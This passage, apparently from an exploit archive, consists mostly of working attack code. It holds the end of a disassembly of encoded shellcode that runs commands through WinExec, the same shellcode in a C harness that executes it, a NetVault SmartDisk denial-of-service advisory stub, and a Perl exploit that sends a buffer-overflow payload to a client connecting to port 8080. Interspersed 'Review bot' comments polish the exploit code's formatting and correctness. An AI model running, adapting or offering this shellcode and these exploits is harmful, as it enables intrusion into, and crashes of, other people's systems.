76: 68 41 41 64 64 push $0x64644141
|
||||
7b: 58 pop %eax
|
||||
7c: c1 e8 08 shr $0x8,%eax
|
||||
7f: c1 e8 08 shr $0x8,%eax
|
||||
82: 50 push %eax
|
||||
83: b9 01 41 60 32 mov $0x32604101,%ecx
|
||||
88: ba 48 61 4f 53 mov $0x534f6148,%edx
|
||||
8d: 31 d1 xor %edx,%ecx
|
||||
8f: 51 push %ecx
|
||||
90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx
|
||||
95: ba 5b 67 4c 63 mov $0x634c675b,%edx
|
||||
9a: 31 d1 xor %edx,%ecx
|
||||
9c: 51 push %ecx
|
||||
9d: b9 03 24 36 21 mov $0x21362403,%ecx
|
||||
a2: ba 62 50 59 53 mov $0x53595062,%edx
|
||||
a7: 31 d1 xor %edx,%ecx
|
||||
a9: 51 push %ecx
|
||||
aa: b9 34 41 15 18 mov $0x18154134,%ecx
|
||||
af: ba 5d 32 61 6a mov $0x6a61325d,%edx
|
||||
b4: 31 d1 xor %edx,%ecx
|
||||
b6: 51 push %ecx
|
||||
b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx
|
||||
bc: ba 68 68 72 4b mov $0x4b726868,%edx
|
||||
c1: 31 d1 xor %edx,%ecx
|
||||
c3: 51 push %ecx
|
||||
c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx
|
||||
c9: ba 5a 57 5b 52 mov $0x525b575a,%edx
|
||||
ce: 31 d1 xor %edx,%ecx
|
||||
d0: 51 push %ecx
|
||||
d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx
|
||||
d6: ba 70 4b 70 51 mov $0x51704b70,%edx
|
||||
db: 31 d1 xor %edx,%ecx
|
||||
dd: 51 push %ecx
|
||||
de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx
|
||||
e3: ba 51 45 51 2d mov $0x2d514551,%edx
|
||||
e8: 31 d1 xor %edx,%ecx
|
||||
ea: 51 push %ecx
|
||||
eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx
|
||||
f0: ba 4d 39 68 39 mov $0x3968394d,%edx
|
||||
f5: 31 d1 xor %edx,%ecx
|
||||
f7: 51 push %ecx
|
||||
f8: 89 e0 mov %esp,%eax
|
||||
fa: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
ff: c1 eb 08 shr $0x8,%ebx
|
||||
102: c1 eb 08 shr $0x8,%ebx
|
||||
105: c1 eb 08 shr $0x8,%ebx
|
||||
108: 53 push %ebx
|
||||
109: 50 push %eax
|
||||
10a: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
10f: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
114: 31 d3 xor %edx,%ebx
|
||||
116: ff d3 call *%ebx
|
||||
118: 31 c0 xor %eax,%eax
|
||||
11a: 50 push %eax
|
||||
11b: 68 41 41 64 64 push $0x64644141
|
||||
120: 58 pop %eax
|
||||
121: c1 e8 08 shr $0x8,%eax
|
||||
124: c1 e8 08 shr $0x8,%eax
|
||||
127: 50 push %eax
|
||||
128: b9 02 63 6b 35 mov $0x356b6302,%ecx
|
||||
12d: ba 4b 43 44 54 mov $0x5444434b,%edx
|
||||
132: 31 d1 xor %edx,%ecx
|
||||
134: 51 push %ecx
|
||||
135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx
|
||||
13a: ba 43 75 2d 71 mov $0x712d7543,%edx
|
||||
13f: 31 d1 xor %edx,%ecx
|
||||
141: 51 push %ecx
|
||||
142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx
|
||||
147: ba 54 5a 49 69 mov $0x69495a54,%edx
|
||||
14c: 31 d1 xor %edx,%ecx
|
||||
14e: 51 push %ecx
|
||||
14f: b9 25 34 12 67 mov $0x67123425,%ecx
|
||||
154: ba 4a 44 32 32 mov $0x3232444a,%edx
|
||||
159: 31 d1 xor %edx,%ecx
|
||||
15b: 51 push %ecx
|
||||
15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx
|
||||
161: ba 6e 71 74 6d mov $0x6d74716e,%edx
|
||||
166: 31 d1 xor %edx,%ecx
|
||||
168: 51 push %ecx
|
||||
169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx
|
||||
16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx
|
||||
173: 31 d1 xor %edx,%ecx
|
||||
175: 51 push %ecx
|
||||
176: b9 35 15 03 2a mov $0x2a031535,%ecx
|
||||
17b: ba 67 70 6e 45 mov $0x456e7067,%edx
|
||||
180: 31 d1 xor %edx,%ecx
|
||||
182: 51 push %ecx
|
||||
183: b9 3a 17 75 46 mov $0x4675173a,%ecx
|
||||
188: ba 6f 47 55 64 mov $0x6455476f,%edx
|
||||
18d: 31 d1 xor %edx,%ecx
|
||||
18f: 51 push %ecx
|
||||
190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx
|
||||
195: ba 6a 72 59 51 mov $0x5159726a,%edx
|
||||
19a: 31 d1 xor %edx,%ecx
|
||||
19c: 51 push %ecx
|
||||
19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx
|
||||
1a2: ba 66 65 45 6b mov $0x6b456566,%edx
|
||||
1a7: 31 d1 xor %edx,%ecx
|
||||
1a9: 51 push %ecx
|
||||
1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx
|
||||
1af: ba 53 65 61 7a mov $0x7a616553,%edx
|
||||
1b4: 31 d1 xor %edx,%ecx
|
||||
1b6: 51 push %ecx
|
||||
1b7: 89 e0 mov %esp,%eax
|
||||
1b9: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
1be: c1 eb 08 shr $0x8,%ebx
|
||||
1c1: c1 eb 08 shr $0x8,%ebx
|
||||
1c4: c1 eb 08 shr $0x8,%ebx
|
||||
1c7: 53 push %ebx
|
||||
1c8: 50 push %eax
|
||||
1c9: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
1ce: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
1d3: 31 d3 xor %edx,%ebx
|
||||
1d5: ff d3 call *%ebx
|
||||
1d7: 31 c0 xor %eax,%eax
|
||||
1d9: 50 push %eax
|
||||
1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx
|
||||
1df: ba 38 6c 53 38 mov $0x38536c38,%edx
|
||||
1e4: 31 d1 xor %edx,%ecx
|
||||
1e6: 51 push %ecx
|
||||
1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx
|
||||
1ec: ba 62 62 5d 34 mov $0x345d6262,%edx
|
||||
1f1: 31 d1 xor %edx,%ecx
|
||||
1f3: 51 push %ecx
|
||||
1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx
|
||||
1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx
|
||||
1fe: 31 d1 xor %edx,%ecx
|
||||
200: 51 push %ecx
|
||||
201: b9 1d 30 15 28 mov $0x2815301d,%ecx
|
||||
206: ba 58 77 4a 6c mov $0x6c4a7758,%edx
|
||||
20b: 31 d1 xor %edx,%ecx
|
||||
20d: 51 push %ecx
|
||||
20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx
|
||||
213: ba 53 5b 77 44 mov $0x44775b53,%edx
|
||||
218: 31 d1 xor %edx,%ecx
|
||||
21a: 51 push %ecx
|
||||
21b: b9 42 25 2a 66 mov $0x662a2542,%ecx
|
||||
220: ba 2d 4b 59 46 mov $0x46594b2d,%edx
|
||||
225: 31 d1 xor %edx,%ecx
|
||||
227: 51 push %ecx
|
||||
228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx
|
||||
22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx
|
||||
232: 31 d1 xor %edx,%ecx
|
||||
234: 51 push %ecx
|
||||
235: b9 20 2b 26 26 mov $0x26262b20,%ecx
|
||||
23a: ba 63 44 48 48 mov $0x48484463,%edx
|
||||
23f: 31 d1 xor %edx,%ecx
|
||||
241: 51 push %ecx
|
||||
242: b9 08 2b 23 67 mov $0x67232b08,%ecx
|
||||
247: ba 66 52 77 34 mov $0x34775266,%edx
|
||||
24c: 31 d1 xor %edx,%ecx
|
||||
24e: 51 push %ecx
|
||||
24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx
|
||||
254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx
|
||||
259: 31 d1 xor %edx,%ecx
|
||||
25b: 51 push %ecx
|
||||
25c: b9 67 67 1d 37 mov $0x371d6767,%ecx
|
||||
261: ba 45 47 32 41 mov $0x41324745,%edx
|
||||
266: 31 d1 xor %edx,%ecx
|
||||
268: 51 push %ecx
|
||||
269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx
|
||||
26e: ba 71 45 68 49 mov $0x49684571,%edx
|
||||
273: 31 d1 xor %edx,%ecx
|
||||
275: 51 push %ecx
|
||||
276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx
|
||||
27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx
|
||||
280: 31 d1 xor %edx,%ecx
|
||||
282: 51 push %ecx
|
||||
283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx
|
||||
288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx
|
||||
28d: 31 d1 xor %edx,%ecx
|
||||
28f: 51 push %ecx
|
||||
290: b9 34 23 23 3b mov $0x3b232334,%ecx
|
||||
295: ba 68 77 46 49 mov $0x49467768,%edx
|
||||
29a: 31 d1 xor %edx,%ecx
|
||||
29c: 51 push %ecx
|
||||
29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx
|
||||
2a2: ba 73 48 65 78 mov $0x78654873,%edx
|
||||
2a7: 31 d1 xor %edx,%ecx
|
||||
2a9: 51 push %ecx
|
||||
2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx
|
||||
2af: ba 48 6d 37 3d mov $0x3d376d48,%edx
|
||||
2b4: 31 d1 xor %edx,%ecx
|
||||
2b6: 51 push %ecx
|
||||
2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx
|
||||
2bc: ba 52 6e 43 46 mov $0x46436e52,%edx
|
||||
2c1: 31 d1 xor %edx,%ecx
|
||||
2c3: 51 push %ecx
|
||||
2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx
|
||||
2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx
|
||||
2ce: 31 d1 xor %edx,%ecx
|
||||
2d0: 51 push %ecx
|
||||
2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx
|
||||
2d6: ba 58 7a 44 44 mov $0x44447a58,%edx
|
||||
2db: 31 d1 xor %edx,%ecx
|
||||
2dd: 51 push %ecx
|
||||
2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx
|
||||
2e3: ba 49 62 78 52 mov $0x52786249,%edx
|
||||
2e8: 31 d1 xor %edx,%ecx
|
||||
2ea: 51 push %ecx
|
||||
2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx
|
||||
2f0: ba 61 31 67 75 mov $0x75673161,%edx
|
||||
2f5: 31 d1 xor %edx,%ecx
|
||||
2f7: 51 push %ecx
|
||||
2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx
|
||||
2fd: ba 62 64 68 73 mov $0x73686462,%edx
|
||||
302: 31 d1 xor %edx,%ecx
|
||||
304: 51 push %ecx
|
||||
305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx
|
||||
30a: ba 36 33 78 69 mov $0x69783336,%edx
|
||||
30f: 31 d1 xor %edx,%ecx
|
||||
311: 51 push %ecx
|
||||
312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx
|
||||
317: ba 31 52 4c 67 mov $0x674c5231,%edx
|
||||
31c: 31 d1 xor %edx,%ecx
|
||||
31e: 51 push %ecx
|
||||
31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx
|
||||
324: ba 58 49 79 72 mov $0x72794958,%edx
|
||||
329: 31 d1 xor %edx,%ecx
|
||||
32b: 51 push %ecx
|
||||
32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx
|
||||
331: ba 2d 65 52 6e mov $0x6e52652d,%edx
|
||||
336: 31 d1 xor %edx,%ecx
|
||||
338: 51 push %ecx
|
||||
339: b9 16 10 1f 17 mov $0x171f1016,%ecx
|
||||
33e: ba 34 58 54 52 mov $0x52545834,%edx
|
||||
343: 31 d1 xor %edx,%ecx
|
||||
345: 51 push %ecx
|
||||
346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx
|
||||
34b: ba 4e 43 68 4e mov $0x4e68434e,%edx
|
||||
350: 31 d1 xor %edx,%ecx
|
||||
352: 51 push %ecx
|
||||
353: b9 39 22 5e 50 mov $0x505e2239,%ecx
|
||||
358: ba 4b 47 39 70 mov $0x7039474b,%edx
|
||||
35d: 31 d1 xor %edx,%ecx
|
||||
35f: 51 push %ecx
|
||||
360: 89 e0 mov %esp,%eax
|
||||
362: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
367: c1 eb 08 shr $0x8,%ebx
|
||||
36a: c1 eb 08 shr $0x8,%ebx
|
||||
36d: c1 eb 08 shr $0x8,%ebx
|
||||
370: 53 push %ebx
|
||||
371: 50 push %eax
|
||||
372: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
377: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
37c: 31 d3 xor %edx,%ebx
|
||||
37e: ff d3 call *%ebx
|
||||
380: 31 c0 xor %eax,%eax
|
||||
382: 50 push %eax
|
||||
383: b8 41 41 41 65 mov $0x65414141,%eax
|
||||
388: c1 e8 08 shr $0x8,%eax
|
||||
38b: c1 e8 08 shr $0x8,%eax
|
||||
38e: c1 e8 08 shr $0x8,%eax
|
||||
391: 50 push %eax
|
||||
392: b9 1e 53 39 3c mov $0x3c39531e,%ecx
|
||||
397: ba 6d 32 5b 50 mov $0x505b326d,%edx
|
||||
39c: 31 d1 xor %edx,%ecx
|
||||
39e: 51 push %ecx
|
||||
39f: b9 04 66 2f 32 mov $0x322f6604,%ecx
|
||||
3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx
|
||||
3a9: 31 d1 xor %edx,%ecx
|
||||
3ab: 51 push %ecx
|
||||
3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx
|
||||
3b1: ba 69 73 62 75 mov $0x75627369,%edx
|
||||
3b6: 31 d1 xor %edx,%ecx
|
||||
3b8: 51 push %ecx
|
||||
3b9: b9 20 41 47 36 mov $0x36474120,%ecx
|
||||
3be: ba 45 35 67 59 mov $0x59673545,%edx
|
||||
3c3: 31 d1 xor %edx,%ecx
|
||||
3c5: 51 push %ecx
|
||||
3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx
|
||||
3cb: ba 47 69 44 59 mov $0x59446947,%edx
|
||||
3d0: 31 d1 xor %edx,%ecx
|
||||
3d2: 51 push %ecx
|
||||
3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx
|
||||
3d8: ba 62 5a 38 43 mov $0x43385a62,%edx
|
||||
3dd: 31 d1 xor %edx,%ecx
|
||||
3df: 51 push %ecx
|
||||
3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx
|
||||
3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx
|
||||
3ea: 31 d1 xor %edx,%ecx
|
||||
3ec: 51 push %ecx
|
||||
3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx
|
||||
3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx
|
||||
3f7: 31 d1 xor %edx,%ecx
|
||||
3f9: 51 push %ecx
|
||||
3fa: 89 e0 mov %esp,%eax
|
||||
3fc: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
401: c1 eb 08 shr $0x8,%ebx
|
||||
404: c1 eb 08 shr $0x8,%ebx
|
||||
407: c1 eb 08 shr $0x8,%ebx
|
||||
40a: 53 push %ebx
|
||||
40b: 50 push %eax
|
||||
40c: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
411: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
416: 31 d3 xor %edx,%ebx
|
||||
418: ff d3 call *%ebx
|
||||
41a: 31 c0 xor %eax,%eax
|
||||
41c: 50 push %eax
|
||||
41d: b8 41 41 41 6f mov $0x6f414141,%eax
|
||||
422: c1 e8 08 shr $0x8,%eax
|
||||
425: c1 e8 08 shr $0x8,%eax
|
||||
428: c1 e8 08 shr $0x8,%eax
|
||||
42b: 50 push %eax
|
||||
42c: b9 72 2a 05 39 mov $0x39052a72,%ecx
|
||||
431: ba 52 4b 70 4d mov $0x4d704b52,%edx
|
||||
436: 31 d1 xor %edx,%ecx
|
||||
438: 51 push %ecx
|
||||
439: b9 54 3a 05 52 mov $0x52053a54,%ecx
|
||||
43e: ba 35 48 71 6f mov $0x6f714835,%edx
|
||||
443: 31 d1 xor %edx,%ecx
|
||||
445: 51 push %ecx
|
||||
446: b9 29 16 0a 47 mov $0x470a1629,%ecx
|
||||
44b: ba 4c 36 79 33 mov $0x3379364c,%edx
|
||||
450: 31 d1 xor %edx,%ecx
|
||||
452: 51 push %ecx
|
||||
453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx
|
||||
458: ba 55 6d 32 5d mov $0x5d326d55,%edx
|
||||
45d: 31 d1 xor %edx,%ecx
|
||||
45f: 51 push %ecx
|
||||
460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx
|
||||
465: ba 41 77 48 75 mov $0x75487741,%edx
|
||||
46a: 31 d1 xor %edx,%ecx
|
||||
46c: 51 push %ecx
|
||||
46d: b9 34 79 3a 12 mov $0x123a7934,%ecx
|
||||
472: ba 53 59 4e 77 mov $0x774e5953,%edx
|
||||
477: 31 d1 xor %edx,%ecx
|
||||
479: 51 push %ecx
|
||||
47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx
|
||||
47f: ba 72 32 78 41 mov $0x41783272,%edx
|
||||
484: 31 d1 xor %edx,%ecx
|
||||
486: 51 push %ecx
|
||||
487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx
|
||||
48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx
|
||||
491: 31 d1 xor %edx,%ecx
|
||||
493: 51 push %ecx
|
||||
494: 89 e0 mov %esp,%eax
|
||||
496: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
49b: c1 eb 08 shr $0x8,%ebx
|
||||
49e: c1 eb 08 shr $0x8,%ebx
|
||||
4a1: c1 eb 08 shr $0x8,%ebx
|
||||
4a4: 53 push %ebx
|
||||
4a5: 50 push %eax
|
||||
4a6: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
4ab: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
4b0: 31 d3 xor %edx,%ebx
|
||||
4b2: ff d3 call *%ebx
|
||||
4b4: bb 9b 4f d0 30 mov $0x30d04f9b,%ebx
|
||||
4b9: ba 63 36 46 46 mov $0x46463663,%edx
|
||||
4be: 31 d3 xor %edx,%ebx
|
||||
4c0: ff d3 call *%ebx
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
int main(){
|
||||
unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba
\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9
\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3";
|
||||
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
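Review bot: `fprintf(stdout,"Length: %d\n\n",strlen(shellcode));` passes a `size_t` to `%d`; `%zu` (or an explicit cast to `int`) is the matching specifier, and `main` is declared `int` but never returns a value. The header calls this "Windows x64", yet the embedded objdump output is `elf32-i386` and the code uses 32-bit registers with stack-pushed arguments, so the title and the `#tested On:` line should state the actual target architecture or explain the discrepancy. The `WinExec` and `ExitProcess` addresses are hard-coded for the single tested build, which the header comment should say explicitly.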
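--- a/platforms/windows/dos/35804.txt
+++ b/platforms/windows/dos/35804.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/48029/info
+
+NetVault: SmartDisk is prone to a remote denial-of-service vulnerability.
+
+A successful exploit will cause the application to crash, effectively denying service.
+
+NOTE: Remote code execution may be possible; however, this has not been confirmed.
+
+NetVault: SmartDisk versions 1.2.2 and prior are affected.
+
+http://www.exploit-db.com/sploits/35804.zip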
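--- a/platforms/windows/local/35741.pl
+++ b/platforms/windows/local/35741.pl
@@ -0,0 +1,25 @@
+#!/use/bin/perl
+# Exploit Title: ?palringo stack buffer overflow
+# Date: 10 January 2015
+# Vulnerability discovered by: Mr.ALmfL9
+# Vendor Homepage: http://www.palringo.com/
+# Software Link: http://www.palringo.com/ar/sa/download/?get=winpc
+# Version: 2.8.1
+# Tested on: Windows 8.1
+use IO::Socket;
+$port = 8080;
+my $payload = "\x41" x 144;
+$payload = $payload. "\x42" x 4 ;
+$payload = $payload. "\x42" x 9000;
+$serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n";
+while($cli=$serv->accept()){
+print "[#] port is: $port\n";
+print $cli "HTTP/$payload\r\n\r\n";
+while(<$cli>){
+print $cli;
+
+}
+}
+#*REFERENCE*
+#.1=http://store2.up-00.com/2015-01/1420867197761.png
+#.2=http://store2.up-00.com/2015-01/1420867235381.png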
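Review bot: `print $cli;`, the only statement in the inner `while(<$cli>)` loop, prints the socket object's stringification to STDOUT rather than the line just read into `$_`; presumably `print $_;` was meant (or `print {$cli} $_;` if the intent is to echo back to the client). The shebang `#!/use/bin/perl` is a typo for `#!/usr/bin/perl`, so the script will not start via the interpreter line on a Unix host. Without `use strict; use warnings;`, `$port`, `$serv` and `$cli` are undeclared package globals; declaring them with `my` would match the `my $payload` line.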